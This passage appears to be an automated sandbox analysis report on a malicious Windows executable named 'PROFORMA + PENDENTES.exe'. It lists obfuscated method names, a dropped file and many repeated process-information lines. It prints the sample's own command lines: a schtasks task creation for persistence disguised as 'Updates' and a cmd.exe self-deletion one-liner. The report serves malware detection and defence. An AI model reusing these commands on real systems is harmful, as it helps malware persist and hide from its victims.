Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, Q5ojRjNNt049wiCCLRb.cs	High entropy of concatenated method names: 'Cgvv9ZWicw', 'EeAvzDPtNd', 'jr5Rc2TKpq', 'tZ8RjekCQ7', 'l1PRujXYFj', 'BjERXT4aP6', 'rNSRBnDrkT', 'FYjRCOLIjV', 'Yp7R6oD75u', 'wpZRe31uW0'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, oqyhYmNFX41kCRZNwVY.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XmJ5EmQLI7', 'YTN5vdGShl', 'MnO5Ry4s4r', 'sCG55Zomaj', 'nyi5w67GGc', 'AY052DtqJS', 'aV95QPHSbB'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, QBD6LeWqfNbDZDo1Gy.cs	High entropy of concatenated method names: 'wiwvKVcg9c', 'xWQvJARZIy', 'pnPvbWDZAr', 'pa1vV9Gt4t', 'IV8vEqYCOk', 'xrJvFS5dai', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, gcGUX2Bedx6QaYS31J.cs	High entropy of concatenated method names: 'DL4XCGrFc2', 'FyrX6GnVT5', 'q2DXe7LTNV', 'WkHXKURASD', 'OXPXJ6OPI2', 'geVXbhn7x3', 'jqiXVZGnum', 'sl1XFbali2', 'SJDXahHKn4', 'Fe2XfGNhEv'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, IYGkQihKqcCcxHNjdZ.cs	High entropy of concatenated method names: 'ToString', 'MyRAUgvlob', 'nNJAyHk491', 'crUALZaJJ9', 'BgaApLO5Ay', 'FOVAn1n3Go', 'KguAN3cXZY', 'YoaAW8hJDe', 'XcpAHNWmY8', 'JGoA3mscTG'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, frWEPPZXcI6c8G7QYF.cs	High entropy of concatenated method names: 'QIMMwSIJX', 'Gg0x1JcmF', 'SlnYPgxAj', 'MkHqWFJf1', 'fSJTB8RFf', 'XBxgPAQsx', 'KVWBhZVwCb97fdle7g', 'lIQ5ij3OjSyYSBkHbu', 'Fqd8gkhdy', 'r5svhZkKt'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, v9ObnkTULXnVyWfjQA.cs	High entropy of concatenated method names: 'JJa4fxXhCk', 'eNo4SgrDmI', 'ToString', 'c6G46TjmZy', 'ceD4eN1UaD', 'zW64KfgV2l', 'AIR4JRH7bd', 'KVN4bDmbGI', 'YKK4V95clx', 'JHM4FteeUN'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, UXkvgCEsWpXnGZrTp9.cs	High entropy of concatenated method names: 'OVvbC6SvZS', 'oDVbeR2v0C', 'EEHbJOxKZI', 'KkabVk1kR4', 'jjAbFMhHx8', 'v3kJmBZxNr', 'fRJJk2i9oZ', 'nyLJIkUOA8', 'Mf7JtCj5TD', 'lN3Jh5AhQI'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, bpHb30nysGa21mKvTL.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'n0PuhgmEo8', 'p4cu9e4d37', 'iHuuz3ERNt', 'XksXcH1dxB', 'RpGXjrJeFm', 'of3XuHyykB', 'Ea3XXxB5MF', 'VDggKGYF84Q68AYS8I6'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, zgBjQosOJogGKDUmJH.cs	High entropy of concatenated method names: 'uVjKxFNrQi', 'ThoKYAbV7S', 'xymKGdA9GE', 'XgmKTKU1Y0', 'FWJKln8yxQ', 'soiKAQTKJR', 'GbMK4RiOlT', 'EtMK880qDI', 'lP3KEIEAse', 'FTgKvyCTUE'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, iAdH3LXHdlUDhWWghq.cs	High entropy of concatenated method names: 'lq87GZttOD', 'VLD7T3gOGR', 'XEs7DSvsJ2', 'L9j7ym97aL', 'L0W7pdvPfu', 'I1Z7nT5UZh', 'dGU7WppYMO', 'gPd7HHPQWh', 'RQG703XAma', 'cVl7UYDGtA'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, ncXHr6HjWNrsHiQysJ.cs	High entropy of concatenated method names: 'iTyEDaiqHH', 'pR0Eyq0gTF', 'loGELJLEhc', 'zTLEpAMcbS', 'mJ4En8yYZX', 's95ENtxAm8', 'De9EWKJ921', 'uZ6EH5dk1K', 'LyTE3y9T0s', 'UpAE0Ey6uF'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, TmssbSfd3CWhJyrnTB.cs	High entropy of concatenated method names: 'QOjEl5yDtM', 'TA4E4v4T3r', 'IFgEEQho8E', 'JFDERKnkEX', 'ztYEw3IRV1', 'M2EEQf6hmW', 'Dispose', 'naJ86jBahl', 'h2o8eiXGmK', 'eSQ8KBCL4R'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, sh5n6iRcoyLbwQk1Ge.cs	High entropy of concatenated method names: 'kIIJr098Pi', 'o4WJqN9MCy', 'kjgKL7HdMZ', 'i5PKp0vwdn', 'jg0KnuZPgQ', 'zS9KNVrn4M', 'FoFKWqvnf0', 'kGPKHUJGhb', 'IAAK3Y2mAc', 'h1uK0XDoAx'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, R8pj7n9eaeWMWbYccx.cs	High entropy of concatenated method names: 'c1n4tp5xxn', 'jMW49ByLhn', 'Yws8csqOsA', 'T2e8jxBoea', 'sMI4UaprmD', 'BNQ4PZ5XoP', 'daS4ZMVt9J', 'HT04dvn7jO', 'Gpc4oncKRk', 'AtM41BSCq6'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, fChceiCHC87KuGpc8k.cs	High entropy of concatenated method names: 'FWcbQAdiDw', 'I4gbibEHV5', 'AKybMG6PDU', 'SRebxhnBte', 'IcgbYX2FcR', 'XEkbqjn0Jd', 'SmlbTAw23U', 'RV3bgl9Xlf', 'x1jfkVNDTFYBMLhCQPh', 'a39g0rNmD926so1NT3r'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, qnqHVqNKvdgemhNcIJx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HAZvUZlXT7', 'TE8vP593lF', 'giTvZrSafo', 'tC6vdKyndM', 'EbEvoffrtF', 'nQOv1NLlhc', 'cn0vOgh5Mr'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, uKGLrW3QqA3lP5biGX.cs	High entropy of concatenated method names: 'cvsedJodIT', 'VadeoPF5B4', 'O5Be1yL9a3', 'ukOeO5duR8', 'fVCemFDjPS', 'U7pekviT5c', 'iQaeIa4jVQ', 'px0et6QQ7E', 'iDFehiDlNC', 'KG6e9pehHD'

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

File created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"			Jump to behavior

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
